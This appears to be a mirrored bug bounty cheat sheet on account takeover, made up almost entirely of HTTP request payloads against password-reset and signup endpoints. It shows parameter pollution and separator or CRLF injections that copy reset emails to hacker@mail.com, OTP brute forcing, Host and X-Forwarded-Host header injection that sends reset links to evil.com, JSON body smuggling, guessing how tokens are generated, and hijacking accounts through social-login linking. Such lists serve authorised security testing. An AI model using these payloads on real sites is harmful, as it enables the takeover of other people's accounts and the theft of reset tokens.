mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
2.1 KiB
2.1 KiB
Account Takeover
- Parameter pollution in reset password
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
- Bruteforce the OTP code
POST /reset
[...]
email=victim@mail.com&code=$123456$
- Host header Injection
POST /reset
Host: evil.com
[...]
email=victim@mail.com
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com
And the victim will receive the reset link with evil.com
- Using separator in value of the parameter
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
- No domain in value of the paramter
POST /reset
[...]
email=victim
- No TLD in value of the parameter
POST /reset
[...]
email=victim@mail
- Using carbon copy
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
- Try re-sign up using same email
POST /newaccount
[...]
email=victim@mail.com&password=1234
After sign up using victim email, try signup again but using different password
POST /newaccount
[...]
email=victim@mail.com&password=hacked
- If there is JSON data in body requests, add comma
POST /newaccount
[...]
{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
- Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
- Account takeover after login (Work if inside the website there is "Connect to facebook/twitter/etc")
- First, login to the website using victim email
- Find "Connect to facebook/twitter/googleplus" or something like that
] - Connect to attacker twitter
- After logout you can login using the twitter